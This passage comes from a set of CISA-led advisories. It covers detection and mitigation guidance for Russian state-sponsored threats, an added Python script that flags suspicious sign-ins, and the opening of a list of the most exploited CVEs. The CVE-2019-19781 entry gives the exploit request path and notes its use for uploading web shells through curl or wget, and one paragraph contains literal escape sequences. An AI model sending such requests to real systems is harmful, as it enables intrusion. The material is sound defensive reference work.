   * Third-party tools, such as Sparrow, Hawk, or CrowdStrike’s Azure Reporting Tool (CRT), to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. **Note:** for guidance on using these and other detection tools, refer to CISA Alert [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>).
 * **Look for behavioral evidence or network and host-based artifacts** from known Russian state-sponsored TTPs. See table 1 for commonly observed TTPs.
   * To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for multiple failed authentication attempts across multiple accounts.
   * To detect use of compromised credentials in combination with a VPS, take the following steps:
     * Look for suspicious “impossible logins,” such as logins with changing username, user agent string, and IP address combinations, or logins where IP addresses do not align with the expected user’s geographic location.
     * Look for one IP used for multiple accounts, excluding expected logins.
     * Look for “impossible travel.” Impossible travel occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the time period between the logins). **Note:** implementing this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting into networks.
   * Look for processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the `ntds.dit` file from a domain controller.
   * Look for suspicious privileged account use after resetting passwords or applying user account mitigations.
   * Look for unusual activity in typically dormant accounts.
   * Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.
   * For organizations with OT/ICS systems:
     * Take note of unexpected equipment behavior; for example, unexpected reboots of digital controllers and other OT hardware and software.
     * Record delays or disruptions in communication with field equipment or other OT devices. Determine if system parts or components are lagging or unresponsive.

### Incident Response

Organizations detecting potential APT activity in their IT or OT networks should:

 1. Immediately isolate affected systems.
 2. Secure backups. Ensure your backup data is offline and secure. If possible, scan your backup data with an antivirus program to ensure it is free of malware.
 3. Collect and review relevant logs, data, and artifacts.
 4. Consider soliciting support from a third-party IT organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
 5. Report incidents to [CISA](<https://www.cisa.gov/uscert/report>) and/or the FBI via your [local FBI field office](<http://www.fbi.gov/contact-us/field>) or the FBI’s 24/7 CyWatch at (855) 292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>).

**Note:** for OT assets, organizations should have a resilience plan that addresses how to operate if you lose access to—or control of—the IT and/or OT environment. Refer to the Mitigations section for more information.

See the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for guidance on hunting or investigating a network, and for common mistakes in incident handling.
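The password-spray, shared-source-IP, and impossible-travel checks from the Detection section above, implemented as an added example (not part of the advisory) over constructed sign-in records. The accounts, IP addresses, coordinates and the `EXPECTED_IPS` allowlist are made-up values, and the 5-accounts-in-10-minutes spray threshold and the 900 km/h travel limit are assumptions a team would tune to its own environment.

```python
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed sample sign-in records (not real data). Each tuple is
# (UTC timestamp, account, source IP, result, (latitude, longitude) of the IP).
SIGNINS = [
    # one source IP failing against many distinct accounts within seconds
    ("2022-01-10T02:00:05", "alice@example.org", "203.0.113.10", "fail", (38.9, -77.0)),
    ("2022-01-10T02:00:07", "bob@example.org", "203.0.113.10", "fail", (38.9, -77.0)),
    ("2022-01-10T02:00:09", "carol@example.org", "203.0.113.10", "fail", (38.9, -77.0)),
    ("2022-01-10T02:00:11", "dave@example.org", "203.0.113.10", "fail", (38.9, -77.0)),
    ("2022-01-10T02:00:13", "erin@example.org", "203.0.113.10", "fail", (38.9, -77.0)),
    ("2022-01-10T02:00:15", "frank@example.org", "203.0.113.10", "success", (38.9, -77.0)),
    # one IP (a VPS) used successfully by several unrelated accounts
    ("2022-01-10T09:10:00", "gina@example.org", "198.51.100.7", "success", (40.7, -74.0)),
    ("2022-01-10T09:12:00", "henry@example.org", "198.51.100.7", "success", (40.7, -74.0)),
    ("2022-01-10T09:15:00", "irene@example.org", "198.51.100.7", "success", (40.7, -74.0)),
    # impossible travel: Washington, DC and then Frankfurt 30 minutes later
    ("2022-01-10T13:00:00", "alice@example.org", "192.0.2.44", "success", (38.9, -77.0)),
    ("2022-01-10T13:30:00", "alice@example.org", "198.51.100.9", "success", (50.1, 8.7)),
    # benign: same user, New York then Philadelphia ten hours apart
    ("2022-01-10T08:00:00", "bob@example.org", "192.0.2.50", "success", (40.7, -74.0)),
    ("2022-01-10T18:00:00", "bob@example.org", "192.0.2.51", "success", (39.9, -75.2)),
    # benign: a known corporate VPN egress address shared by many users
    ("2022-01-10T10:00:00", "gina@example.org", "192.0.2.1", "success", (41.9, -87.6)),
    ("2022-01-10T10:01:00", "bob@example.org", "192.0.2.1", "success", (41.9, -87.6)),
    ("2022-01-10T10:02:00", "carol@example.org", "192.0.2.1", "success", (41.9, -87.6)),
]

# Expected egress addresses (here a hypothetical corporate VPN). Excluding them
# is how the advisory's false-positive caveat for impossible travel is applied.
EXPECTED_IPS = frozenset({"192.0.2.1"})


def parse_ts(s):
    return datetime.fromisoformat(s)


def distance_km(a, b):
    """Great-circle distance in km between two (lat, lon) pairs (haversine)."""
    lat1, lon1, lat2, lon2 = map(radians, (*a, *b))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def password_spray(events, window_min=10, min_accounts=5):
    """Source IPs whose failed logins hit at least min_accounts distinct
    accounts inside any window_min-minute window (the T1110.003 pattern)."""
    by_ip = defaultdict(list)
    for t, user, ip, result, _ in events:
        if result == "fail":
            by_ip[ip].append((parse_ts(t), user))
    hits = defaultdict(set)
    for ip, fails in by_ip.items():
        fails.sort()
        lo = 0
        for hi in range(len(fails)):  # sliding window over time-sorted failures
            while (fails[hi][0] - fails[lo][0]).total_seconds() > window_min * 60:
                lo += 1
            users = {u for _, u in fails[lo:hi + 1]}
            if len(users) >= min_accounts:
                hits[ip].update(users)
    return {ip: sorted(u) for ip, u in hits.items()}


def shared_source_ip(events, min_accounts=3, expected=EXPECTED_IPS):
    """One IP used successfully by at least min_accounts distinct accounts,
    excluding expected logins such as the corporate VPN egress."""
    by_ip = defaultdict(set)
    for _, user, ip, result, _ in events:
        if result == "success" and ip not in expected:
            by_ip[ip].add(user)
    return {ip: sorted(u) for ip, u in by_ip.items() if len(u) >= min_accounts}


def impossible_travel(events, max_kmh=900.0, expected=EXPECTED_IPS):
    """Consecutive successful sign-ins by one account whose implied speed
    exceeds max_kmh (roughly airliner speed). Each finding is
    (account, first IP, second IP, km, hours)."""
    by_user = defaultdict(list)
    for t, user, ip, result, geo in events:
        if result == "success" and ip not in expected:
            by_user[user].append((parse_ts(t), ip, geo))
    findings = []
    for user, logins in by_user.items():
        logins.sort()
        for (t1, ip1, g1), (t2, ip2, g2) in zip(logins, logins[1:]):
            km = distance_km(g1, g2)
            hours = max((t2 - t1).total_seconds() / 3600, 1 / 3600)  # avoid /0
            if km / hours > max_kmh:
                findings.append((user, ip1, ip2, round(km), round(hours, 2)))
    return findings


if __name__ == "__main__":
    print("password spray:", password_spray(SIGNINS))
    print("shared source IP:", shared_source_ip(SIGNINS))
    print("impossible travel:", impossible_travel(SIGNINS))
```

Dropping the allowlist (`expected=frozenset()`) makes the VPN egress address show up as a shared IP, which is the false positive the advisory's note warns about.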
CISA, the FBI, and NSA encourage critical infrastructure owners and operators to see CISA’s [Federal Government Cybersecurity Incident and Vulnerability Response Playbooks](<https://cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf>). Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail each step for both incident and vulnerability response.

**Note:** organizations should document incident response procedures in a cyber incident response plan, which organizations should create and exercise (as noted in the Mitigations section).

### Mitigations

CISA, the FBI, and NSA encourage all organizations to implement the following recommendations to increase their cyber resilience against this threat.

### Be Prepared

#### _Confirm Reporting Processes and Minimize Coverage Gaps_

 * Develop internal contact lists. Assign main points of contact for a suspected incident as well as roles and responsibilities, and ensure personnel know how and when to report an incident.
 * Minimize gaps in IT/OT security personnel availability by identifying surge support for responding to an incident. Malicious cyber actors are [known to target organizations on weekends and holidays](<https://us-cert.cisa.gov/ncas/alerts/aa21-243a>) when there are gaps in organizational cybersecurity—critical infrastructure organizations should proactively protect themselves by minimizing gaps in coverage.
 * Ensure IT/OT security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any identified IOCs and TTPs for immediate response. (See table 1 for commonly observed TTPs.)

#### _Create, Maintain, and Exercise a Cyber Incident Response, Resilience Plan, and Continuity of Operations Plan_

 * Create, maintain, and exercise a cyber incident response and continuity of operations plan.
 * Ensure personnel are familiar with the key steps they need to take during an incident and are positioned to act in a calm and unified manner. Key questions:
   * Do personnel have the access they need?
   * Do they know the processes?
 * For OT assets/networks:
   * Identify a resilience plan that addresses how to operate if you lose access to—or control of—the IT and/or OT environment.
   * Identify OT and IT network interdependencies and develop workarounds or manual controls to ensure ICS networks can be isolated if the connections create risk to the safe and reliable operation of OT processes. Regularly test contingency plans, such as manual controls, so that safety-critical functions can be maintained during a cyber incident. Ensure that the OT network can operate at necessary capacity even if the IT network is compromised.
   * Regularly test manual controls so that critical functions can be kept running if ICS or OT networks need to be taken offline.
 * Implement data backup procedures on both the IT and OT networks. Backup procedures should be conducted on a frequent, regular basis. Regularly test backup procedures and ensure that backups are isolated from network connections that could enable the spread of malware.
   * In addition to backing up data, develop recovery documents that include configuration settings for common devices and critical OT equipment. This can enable more efficient recovery following an incident.

### Enhance your Organization’s Cyber Posture

CISA, the FBI, and NSA recommend organizations apply the best practices below for identity and access management, protective controls and architecture, and vulnerability and configuration management.

#### _Identity and Access Management_

 * Require multi-factor authentication for all users, without exception.
 * Require accounts to have strong passwords, and do not allow passwords to be used across multiple accounts or stored on a system to which an adversary may have access.
 * Secure credentials. Russian state-sponsored APT actors have demonstrated their ability to maintain persistence using compromised credentials.
   * Use virtualizing solutions on modern hardware and software to ensure credentials are securely stored.
   * Disable the storage of clear text passwords in LSASS memory.
   * Consider disabling or limiting New Technology Local Area Network Manager (NTLM) and WDigest Authentication.
   * Implement Credential Guard for Windows 10 and Server 2016 (refer to [Microsoft: Manage Windows Defender Credential Guard](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage>) for more information). For Windows Server 2012 R2, enable Protected Process Light for Local Security Authority (LSA).
 * Minimize the Active Directory attack surface to reduce malicious ticket-granting activity. Malicious activity such as “Kerberoasting” takes advantage of Kerberos’ TGS and can be used to obtain hashed credentials that attackers attempt to crack.
   * Set a [strong](<https://www.us-cert.cisa.gov/ncas/tips/ST04-002>) password policy for service accounts.
   * Audit Domain Controllers to log successful Kerberos TGS requests and ensure the events are monitored for anomalous activity.
 * Secure accounts.
   * Enforce the principle of least privilege. Administrator accounts should have the minimum permissions they need to do their tasks.
   * Ensure there are unique and distinct administrative accounts for each set of administrative tasks.
   * Create non-privileged accounts for privileged users and ensure they use the non-privileged accounts for all non-privileged access (e.g., web browsing, email access).

#### _Protective Controls and Architecture_

 * Identify, detect, and investigate abnormal activity that may indicate lateral movement by a threat actor or malware. Use network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
 * Enable strong spam filters.
   * Enable strong spam filters to prevent phishing emails from reaching end users.
   * Filter emails containing executable files to prevent them from reaching end users.
   * Implement a user training program to discourage users from visiting malicious websites or opening malicious attachments.

**Note:** CISA, the FBI, and NSA also recommend, as a longer-term effort, that critical infrastructure organizations implement network segmentation to separate network segments based on role and functionality. Network segmentation can help prevent lateral movement by controlling traffic flows between—and access to—various subnetworks.

 * Appropriately implement network segmentation between IT and OT networks. Network segmentation limits the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone that eliminates unregulated communication between the IT and OT networks.
 * Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to filter network traffic and monitor communications between zones. Prohibit ICS protocols from traversing the IT network.

#### _Vulnerability and Configuration Management_

 * Update software, including operating systems, applications, and firmware on IT network assets, in a timely manner. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.
   * Consider using a centralized patch management system. For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.
   * Consider signing up for CISA’s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>), including vulnerability scanning, to help reduce exposure to threats. CISA’s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IP addresses for accessible services and vulnerabilities.
 * Use industry-recommended antivirus programs.
   * Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures.
   * Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.
 * Implement rigorous configuration management programs. Ensure the programs can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses.
 * Disable all unnecessary ports and protocols.
   * Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for command and control activity.
   * Turn off or disable any unnecessary services (e.g., PowerShell) or functionality within devices.
 * Ensure OT hardware is in read-only mode.

### Increase Organizational Vigilance

 * Regularly review reporting on this threat. Consider signing up for CISA notifications to receive timely information on current security issues, vulnerabilities, and high-impact activity.

### Resources

 * For more information on Russian state-sponsored malicious cyber activity, refer to [cisa.gov/Russia](<https://www.us-cert.cisa.gov/russia>).
 * Refer to CISA Analysis Report [Strengthening Security Configurations to Defend Against Attackers Targeting Cloud Services](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-013a>) for guidance on strengthening your organization’s cloud security practices.
 * Leaders of small businesses and small and local government agencies should see [CISA’s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>) for guidance on developing an actionable understanding of implementing organizational cybersecurity practices.
 * Critical infrastructure owners and operators with OT/ICS networks should review the following resources for additional information:
   * NSA and CISA joint CSA: NSA and CISA Recommend Immediate Actions to Reduce Exposure Across Operational Technologies and Control Systems.
   * CISA factsheet: Rising Ransomware Threat to Operational Technology Assets, for additional recommendations.

### Rewards for Justice Program

If you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State’s Rewards for Justice Program.
You may be eligible for a reward of up to $10 million, which DOS is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact +1-202-702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details refer to [rewardsforjustice.net/malicious_cyber_activity](<https://www.rewardsforjustice.net/malicious_cyber_activity.html>).

### Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. CISA, the FBI, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or NSA.

### References

[[1] Joint NCSC-CISA UK Advisory: Further TTPs Associated with SVR Cyber Actors](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>)

### Revisions

 * January 11, 2022: Initial Version
 * January 25, 2022: Updated broken link
 * February 28, 2022: Updated broken link

Advisory record AA22-011A: "Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure" (<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-011a>). Type: ics; published 2022-03-01T12:00:00; modified 2022-03-01T12:00:00. CVSS v3.1 base score 10.0, CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H); CVSS v2 base score 10.0, HIGH (AV:N/AC:L/Au:N/C:C/I:C/A:C). CVEs referenced: CVE-2018-13379, CVE-2019-10149, CVE-2019-11510, CVE-2019-1653, CVE-2019-19781, CVE-2019-2725, CVE-2019-7609, CVE-2019-9670, CVE-2020-0688, CVE-2020-1472, CVE-2020-14882, CVE-2020-4006, CVE-2020-5902, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065.

Next advisory record (last seen 2023-03-14T18:31:18):

### Summary

This Joint Cybersecurity Advisory was coauthored by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom’s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).

This advisory provides details on the top 30 vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021.

Cyber actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations worldwide.
However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.

### Technical Details

### Key Findings

In 2020, cyber actors readily exploited recently disclosed vulnerabilities to compromise unpatched systems. Based on data available to the U.S. Government, a majority of the top vulnerabilities targeted in 2020 were disclosed during the past two years. Cyber actor exploitation of more recently disclosed software flaws in 2020 probably stems, in part, from the expansion of remote work options amid the COVID-19 pandemic. The rapid shift and increased use of remote work options, such as virtual private networks (VPNs) and cloud-based environments, likely placed additional burden on cyber defenders struggling to maintain and keep pace with routine software patching.

**Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies.** Many VPN gateway devices remained unpatched during 2020, with the growth of remote work options challenging the ability of organizations to conduct rigorous patch management.

CISA, ACSC, the NCSC, and FBI consider the vulnerabilities listed in table 1 to be the topmost regularly exploited CVEs by cyber actors during 2020.

_Table 1: Top Routinely Exploited CVEs in 2020_

Vendor | CVE | Type
---|---|---
Citrix | CVE-2019-19781 | arbitrary code execution
Pulse | CVE-2019-11510 | arbitrary file reading
Fortinet | CVE-2018-13379 | path traversal
F5 BIG-IP | CVE-2020-5902 | remote code execution (RCE)
MobileIron | CVE-2020-15505 | RCE
Microsoft | CVE-2017-11882 | RCE
Atlassian | CVE-2019-11580 | RCE
Drupal | CVE-2018-7600 | RCE
Telerik | CVE-2019-18935 | RCE
Microsoft | CVE-2019-0604 | RCE
Microsoft | CVE-2020-0787 | elevation of privilege
Microsoft | CVE-2020-1472 | elevation of privilege

In 2021, malicious cyber actors continued to target vulnerabilities in perimeter-type devices. Among those highly exploited in 2021 are vulnerabilities in Microsoft, Pulse, Accellion, VMware, and Fortinet.

CISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries’ use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known.

Organizations are encouraged to remediate or mitigate vulnerabilities as quickly as possible to reduce the risk of exploitation. Most can be remediated by patching and updating systems. Organizations that have not remediated these vulnerabilities should investigate for the presence of IOCs and, if compromised, initiate incident response and recovery plans. See the Contact Information section below for how to reach CISA to report an incident or request technical assistance.

### 2020 CVEs

CISA, ACSC, the NCSC, and FBI have identified the following as the topmost exploited vulnerabilities by malicious cyber actors from 2020: CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2020-5902, CVE-2020-15505, CVE-2020-0688, CVE-2019-3396, CVE-2017-11882, CVE-2019-11580, CVE-2018-7600, CVE-2019-18935, CVE-2019-0604, CVE-2020-0787, CVE-2020-1472.[[1](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)][[2](<https://media.defense.gov/2021/May/07/2002637232/-1/-1/0/ADVISORY FURTHER TTPS ASSOCIATED WITH SVR CYBER ACTORS.PDF>)][[3](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)] Among these vulnerabilities, CVE-2019-19781 was the most exploited flaw in 2020, according to U.S. Government technical analysis. CVE-2019-19781 is a recently disclosed critical vulnerability in Citrix’s Application Delivery Controller (ADC)—a load balancing application for web, application, and database servers widely used throughout the United States.[[4](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)][[5](<https://www.ncsc.gov.uk/news/citrix-alert>)] Nation-state and criminal cyber actors most likely favor using this vulnerability because it is easy to exploit, Citrix servers are widespread, and exploitation enables the actors to perform unauthorized RCE on a target system.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)]

Identified as emerging targets in early 2020,[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)] unremediated instances of CVE-2019-19781 and CVE-2019-11510 continued to be exploited throughout the year by nation-state advanced persistent threat actors (APTs) who leveraged these and other vulnerabilities, such as CVE-2018-13379,[[8](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)][[9](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)] in VPN services[[10](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating Recent VPN Vulnerabilities - Copy.pdf>)][[11](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)] to compromise an array of organizations, including those involved in COVID-19 vaccine development.[[12](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)][[13](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)]

The CVE-2019-11510 vulnerability in Pulse Connect Secure VPN was also frequently targeted by nation-state APTs. Actors can exploit the vulnerability to steal the unencrypted credentials for all users on a compromised Pulse VPN server and can retain unauthorized access after the system is patched unless all compromised credentials are changed. Nation-state APTs also commonly exploited CVE-2020-15505 and CVE-2020-5902.[[14](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[15](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[16](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)][[17](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)]

### 2021 CVEs

In 2021, cyber actors continued to target vulnerabilities in perimeter-type devices. In addition to the 2020 CVEs listed above, organizations should prioritize patching for the following CVEs known to be exploited.

 * **Microsoft Exchange:** CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065
   * See CISA’s Alert: Mitigate Microsoft Exchange Server Vulnerabilities for more information on identifying and mitigating malicious activity concerning these vulnerabilities.
 * **Pulse Secure:** CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900
   * See CISA’s Alert: Exploitation of Pulse Connect Secure Vulnerabilities for more information on how to investigate and mitigate this malicious activity.
 * **Accellion:** CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, and CVE-2021-27104
   * See the Australia-New Zealand-Singapore-UK-U.S. Joint Cybersecurity Advisory: Exploitation of Accellion File Transfer Appliance for technical details and mitigations.
 * **VMware:** CVE-2021-21985
   * See CISA’s Current Activity: Unpatched VMware vCenter Software for more information and guidance.
 * **Fortinet:** CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591
   * See the CISA-FBI Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks for more details and mitigations.

### Mitigations and Indicators of Compromise

One of the most effective best practices to mitigate many vulnerabilities is to update software versions once patches are available and as soon as is practicable. If this is not possible, consider applying temporary workarounds or other mitigations, if provided by the vendor. If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems). This advisory highlights vulnerabilities that should be considered as part of the prioritization process. To further assist remediation, automatic software updates should be enabled whenever possible.
\n\nFocusing scarce cyber defense resources on patching those vulnerabilities that cyber actors most often use offers the potential of bolstering network security while impeding our adversaries\u2019 operations. For example, nation-state APTs in 2020 extensively relied on a single RCE vulnerability discovered in the Atlassian Crow, a centralized identity management and application (CVE-2019-11580) in its reported operations. A concerted focus on patching this vulnerability could have a relative broad impact by forcing the actors to find alternatives, which may not have the same broad applicability to their target set. \n\nAdditionally, attackers commonly exploit weak authentication processes, particularly in external-facing devices. Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n\nTables 2\u201314 provide more details about, and specific mitigations for, each of the top exploited CVEs in 2020. \n\n**Note:** The lists of associated malware corresponding to each CVE below are not meant to be exhaustive but intended to identify a malware family commonly associated with exploiting the CVE. \n\n\n_Table 2: CVE-2019-19781 Vulnerability Details_\n\n**Citrix Netscaler Directory Traversal (CVE-2019-19781)** \n \n--- \n \n_**Vulnerability Description**_ \nCitrix Netscaler Application Delivery Control (ADC) is vulnerable to RCE and full system compromise due to poor access controls, thus allowing directory traversal. \n\n| \n\n_**CVSS 3.02**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThe lack of adequate access controls allows an attacker to enumerate system directories for vulnerable code (directory traversal). 
In this instance, Citrix ADC maintains a vulnerable Perl script (`newbm.pl`) that, when accessed via an `HTTP POST` request (`POST https://$TARGET/vpn/../vpn/portal/scripts/newbm.pl`), allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software (a webshell or reverse-shell executable) using embedded commands (e.g., `curl`, `wget`, `Invoke-WebRequest`) and gain unauthorized access to the OS.

_Multiple malware campaigns, including NOTROBIN, have taken advantage of this vulnerability._

_**Fix**_

[Patch Available](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)

_**Recommended Mitigations**_

 * Implement the appropriate refresh build according to the vulnerability details outlined by the vendor: Citrix: Mitigation Steps for CVE-2019-19781.
 * If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).

_**Detection Methods**_

 * CISA has developed a free detection tool for this vulnerability: [cisagov/check-cve-2019-19781](<https://github.com/cisagov/check-cve-2019-19781>): Test a host for susceptibility to CVE-2019-19781.
 * Nmap developed a script that can be used with the port scanning engine: [CVE-2019-19781 - Citrix ADC Path Traversal #1893](<https://github.com/nmap/nmap/pull/1893/files>).
 * Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: [Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781>).
 * CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>.
_**Vulnerable Technologies and Versions**_

Citrix ADC and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0

_**References and Additional Guidance**_

 * [Citrix Blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)
 * [National Institute for Standards and Technology (NIST) National Vulnerability Database (NVD): Vulnerability Detail CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)
 * [Tripwire Vulnerability and Exposure Research Team (VERT) Article: Citrix NetScaler CVE-2019-19781: What You Need to Know](<https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>)
 * [National Security Agency Cybersecurity Advisory: Critical Vulnerability In Citrix Application Delivery Controller (ADC) And Citrix Gateway](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA FOR CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)
 * [CISA Alert: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)
 * [NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)
 * [CISA-NCSC Joint Cybersecurity Advisory: COVID-19 Exploited by Malicious Cyber Actors](<https://us-cert.cisa.gov/ncas/alerts/aa20-099a>)
 * [CISA Alert: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)
 * [FBI-CISA Joint Cybersecurity Advisory: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders](<https://www.ic3.gov/Media/News/2021/210426.pdf>)
 * [DoJ: Seven International Cyber Defendants, Including “Apt41” Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims
Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)
 * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)
 * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>)
 * [GitHub: nsacyber / Mitigating Web Shells](<https://github.com/nsacyber/Mitigating-Web-Shells>)

_Table 3: CVE-2019-11510 Vulnerability Details_

**Pulse Secure Connect VPN (CVE-2019-11510)**

_**Vulnerability Description**_

